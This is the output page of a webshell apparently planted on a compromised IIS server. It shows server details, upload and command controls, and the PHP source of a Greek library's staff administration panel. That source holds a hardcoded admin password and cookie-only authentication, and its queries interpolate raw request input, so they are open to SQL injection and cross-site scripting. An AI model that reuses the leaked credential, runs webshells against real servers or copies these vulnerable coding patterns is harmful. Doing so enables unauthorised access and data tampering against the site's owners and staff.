403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/libteiser/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/libteiser/control_stuff.php
<?
include("dbconnect.php");

if ($submitcode)
{
					if ($password=="libteiser2007")
					{
							setcookie ("LibTeiserAdmin", "logged");
							$loginstatus=true;
					}
					else
						    $loginstatus=false;
				  
				  }				
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Βιβλιοθήκη ΤΕΙ Σερρών - Πίνακας Διαχείρισης Προσωπικού</title>
<SCRIPT LANGUAGE="JavaScript">
<!--
function confirm_delete(id)
{
		msg="Θέλετε να διαγράψετε την εγγραφή;";
		input_box=confirm(msg);
		if (input_box==true)
		{
			// Output when Cancel is clicked
			url="control_stuff.php?delete=1&deleteid="+id;
			window.location.href=url;
		}

}


	//-->
	</SCRIPT>
</head>
<body bgcolor="#A48660">
<div align="center">

<?
if (isset($LibTeiserAdmin) or $loginstatus==true)
{
?>
  
				  <center>
				  <form method="POST" name="insertform" action="control_stuff.php">
				  <table bgcolor="#D4B481" border="0" cellpadding="4" cellspacing="0" style="font-size: 12px; font-family: Verdana" width="800">
					<tr>
					  <td align="center" bgcolor="#960807">
						<p align="center"><font color="#F4F4F4"><b>&nbsp; ΒΙΒΛΙΟΘΗΚΗ ΤΕΙ ΣΕΡΡΩΝ&nbsp;&nbsp;</b></font></td>
					</tr>
					<tr>
					  <td align="center" bgcolor="#960807"><b><font color="#F4F4F4">ΠΙΝΑΚΑΣ ΔΙΑΧΕΙΡΙΣΗΣ ΠΡΟΣΩΠΠΙΚΟΥ</font></b></td>
					</tr>
					<tr>
					  <td height="10"></td>
					</tr>

					
				<?
				if ($insert)
				{
				?>
										<tr>
										  <td height="20">
											<p align="center"><b>Εισαγωγή νέου Υπαλλήλου | <a href="control_stuff.php?showall=1">Προβολή όλων των Υπαλλήλων</a> | <a href="control.php">Κεντρικό Μενού</a></b></td>
										</tr>
										<tr>
										  <td height="20"></td>
										</tr>
										<tr>
										  <td>
											  <b>Ονοματεπώνυμο Υπαλλήλου</b><br>
											  <input type="text" name="name" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Ονοματεπώνυμο Υπαλλήλου (Αγγλικά)</b><br>
											  <input type="text" name="name_en" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Ονοματεπώνυμο Υπαλλήλου (Γαλλικά)</b><br>
											  <input type="text" name="name_fr" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τίτλος Υπαλλήλου</b><br>
											  <input type="text" name="title" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τίτλος Υπαλλήλου (Αγγλικά)</b><br>
											  <input type="text" name="title_en" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τίτλος Υπαλλήλου (Γαλλικά)</b><br>
											  <input type="text" name="title_fr" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Email</b><br>
											  <input type="text" name="email" size="40" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τηλέφωνο</b><br>
											  <input type="text" name="phone" size="20" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Ιστοσελίδα</b><br>
											  <input type="text" name="url" size="20" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Θέση εμφάνισης στην ιστοσελίδα</b><br>
											  <input type="text" name="pos" size="1" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td><input type="submit" value="Προσθήκη" name="submit">&nbsp; <input type="reset" value="Καθαρισμός" name="reset"></td>
										</tr>
										  </table></form>
									  </center>
									</div>
									

				<?
				}
				else
				if ($edit)
				{
										$result = mysqli_query($db, "SELECT * FROM stuff WHERE id='$id'");
										$myrow = mysqli_fetch_array($result);
									?>

										<tr>
										  <td height="20">
											<p align="center"><b><a href="control_stuff.php?insert=1">Εισαγωγή νέου Υπαλλήλου</a> | <a href="control_stuff.php?showall=1">Προβολή όλων των Υπαλλήλων</a> | <a href="control.php">Κεντρικό Μενού</a></b></td>
										</tr>
										<tr>
										  <td height="20"></td>
										</tr>
										<tr>
										  <td>
											  <b>Ονοματεπώνυμο Υπαλλήλου</b><br>
											  <input type="text" name="name" value="<? echo $myrow["name"]; ?>" size="80" maxlength="255">
											  <input type="hidden" name="id" value=<? echo $id ?>>	
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Ονοματεπώνυμο Υπαλλήλου (Αγγλικά)</b><br>
											  <input type="text" name="name_en" value="<? echo $myrow["name_en"]; ?>" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Ονοματεπώνυμο Υπαλλήλου (Γαλλικά)</b><br>
											  <input type="text" name="name_fr" value="<? echo $myrow["name_fr"]; ?>" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τίτλος Υπαλλήλου</b><br>
											  <input type="text" name="title" value="<? echo $myrow["title"]; ?>" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τίτλος Υπαλλήλου (Αγγλικά)</b><br>
											  <input type="text" name="title_en" value="<? echo $myrow["title_en"]; ?>" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τίτλος Υπαλλήλου (Γαλλικά)</b><br>
											  <input type="text" name="title_fr" value="<? echo $myrow["title_fr"]; ?>" size="80" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Email</b><br>
											  <input type="text" name="email" value="<? echo $myrow["email"]; ?>" size="40" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Τηλέφωνο</b><br>
											  <input type="text" name="phone" value="<? echo $myrow["phone"]; ?>" size="20" maxlength="255">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Ιστοσελίδα</b><br>
											  <input type="text" name="url" size="20" maxlength="255" value="<? echo $myrow["url"]; ?>">
										  </td>
										</tr>
										<tr>
										  <td>
											  <b>Θέση εμφάνισης στην ιστοσελίδα</b><br>
											  <input type="text" name="pos" value="<? echo $myrow["pos"]; ?>" size="1" maxlength="255">
										  </td>
										</tr>
									   <tr>
										  <td><input type="submit" value="Ενημέρωση" name="update">&nbsp; <input type="reset" value="Καθαρισμός" name="reset"></td>
										</tr>
									  </table></form>
									  </center>
									</div>

				<?
				}
				else
				{
									if ($submit)
									{
													echo "<tr><td>";

													$sql = "INSERT INTO stuff (name,name_en,name_fr, title, title_en, title_fr, email, phone, pos, url) VALUES ('$name','$name_en','$name_fr','$title','$title_en','$title_fr','$email','$phone','$pos','$url')";
													$result = mysqli_query($db, $sql);
													echo "<p align=center>Σας ευχαριστούμε! Ο υπάλληλος καταχωρήθηκε επιτυχώς!!!<p>";
													echo "</td></tr>";

									}
									else
									if ($delete)
									{
												echo "<tr><td>";
												$sql = "DELETE FROM stuff WHERE id=$deleteid";
												$result = mysqli_query($db, $sql);
												echo "<p align=center>Ο υπάλληλος διαγράφηκε επιτυχώς!!!<p>";
												echo "</td></tr>";
									}
									else
									if ($update)
									{
												echo "<tr><td>";
												
												$sql = "UPDATE stuff SET name='$name',name_en='$name_en',name_fr='$name_fr',title='$title',title_en='$title_en',title_fr='$title_fr', email='$email', phone='$phone', pos='$pos', url='$url' WHERE id=$id";
												$result = mysqli_query($db, $sql);
												echo "<p align=center>Σας ευχαριστούμε! Τα στοιχεία του υπαλλήλου ενημερώθηκαν επιτυχώς!!!<p>";
												echo "</td></tr>";
									}

									$result = mysqli_query($db, "SELECT * FROM stuff ORDER BY pos");
								?>

									<tr>
									  <td height="20">
										<p align="center"><b><a href="control_stuff.php?insert=1">Εισαγωγή νέου Υπαλλήλου</a> | Προβολή όλων των Υπαλλήλων | <a href="control.php">Κεντρικό Μενού</a></b><br>
										
										<p align="center">


									</td>
									</tr>
									<tr>
									  <td height="20"></td>
									</tr>
								  </table>
								  </center>
								</div>

								<div align="center">
								  <center>
								  <table bgcolor="#EFDFC7" border=0 cellspacing="3" width="800" style="font-family: Verdana; font-size: 12px" cellpadding="3">
									<tr>
									  <td width="10" align="center" bgcolor="#960807"><b><font color="#F4F4F4">Α/Α</font></b></td>
									  <td width="200" align="center" bgcolor="#960807"><b><font color="#F4F4F4">Όνομα</font></b></td>
									  <td width="200" align="center" bgcolor="#960807"><b><font color="#F4F4F4">Τίτλος</font></b></td>
									  <td width="200" align="center" bgcolor="#960807"><b><font color="#F4F4F4">Email</font></b></td>
									  <td width="100" align="center" bgcolor="#960807"><b><font color="#F4F4F4">Tηλέφωνο</font></b></td>
									  <td width="50" align="center" bgcolor="#960807"><b><font color="#F4F4F4">Θέση εμφάνισης</font></b></td>
									  <td width="20" bgcolor="#960807">&nbsp;</td>
									  <td width="20" bgcolor="#960807">&nbsp;</td>
									</tr>

									<? 
									$aa=1;
									while ($myrow = mysqli_fetch_array($result))
									{	
									?>
									
										<tr>
										  <td bgcolor="#960807">
											<p align="center"><font color="#F4F4F4"><? echo $aa; $aa=$aa+1; ?></font></p>
										  </td>
										  <td valign="top" bgcolor="#D5B582"><font color="#000000">
										  <? echo $myrow["name"]; ?>
											</font>
										  </td>
										  <td valign="top" bgcolor="#D5B582"><font color="#000000">
										  <? echo $myrow["title"]; ?>
											</font>
										  </td>
										  <td valign="top" bgcolor="#D5B582"><font color="#000000">
										  <? echo $myrow["email"]; ?>
											</font>
										  </td>
										  <td valign="top" bgcolor="#D5B582"><font color="#000000">
										  <? echo $myrow["phone"]; ?>
											</font>
										  </td>
										  <td align="center" valign="top" bgcolor="#D5B582"><font color="#000000">
										  <? echo $myrow["pos"]; ?>
											</font>
										  </td>
										  <td align="center" bgcolor="#D5B582">
											<font color="#000000"><a title="Επεξεργασία" href="control_stuff.php?edit=1&id=<? echo $myrow["id"]; ?>"><b><font face="Wingdings 2" size="4"><font color="#000080">$</font></b></a>
										</td>
										  <td align="center" bgcolor="#D5B582">
											<a title="Διαγραφή" onClick="confirm_delete(<? echo $myrow["id"]; ?>)" href="#"><font face="Wingdings 2" size="5"><font color="#CC0000">O</font></font></a></font>
										</td>
										</tr>
									<? } ?>
									  </table>
								</div>
								<p align="center">

								<?

		}
}  
else if ($submitcode and $loginstatus==false)
{
?>
				<table bgcolor="#D5B582" border="0" cellspacing="3" cellpadding="0" style="font-size: 11px; font-family: Tahoma" width="300">
				<tr>
				<td colspan='2'><font color="#000000">Δώσατε λάθος κωδικό πρόσβασης. Προσπαθείστε ξανά.</font></td>
				</tr>
				<tr>
					<td colspan='2' height=5></td>
				</tr>
				<tr>
					<form method="POST" action="control_stuff.php">
					<td><font color="#000000">Κωδικός:</font><br><input type='password' name='password' size='20'><br>
					<input type="hidden" name="submitcode" value="ok">
					<br>
					<input type='submit' value='Είσοδος' name='enter' style='font-size: 10px'></td>
					</form>
				</tr>
				</table>
<?
}
else
{
?>
					<table bgcolor="#D5B582" border="0" cellpadding="5" style="font-size: 11px; font-family: Tahoma; border: 1 solid #666666" width="300">
					<td colspan='2'><font color="#000000">Δώστε τον κωδικό πρόσβασής σας για να εισέλθετε στον πίνακα ελέγχου.</font></td>
					</tr>
					<tr>
						<td colspan='2' height=5></td>
					</tr>
					<tr>
						<form method="POST" action="control_stuff.php">
						<td><font color="#000000">Κωδικός:</font><br><input type='password' name='password' size='20'><br>
						<input type="hidden" name="submitcode" value="ok">
						<br>
						<input type='submit' value='Είσοδος' name='enter' style='font-size: 10px'></td>
						</form>
					</tr>
				</table>

				
<?
}
?>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit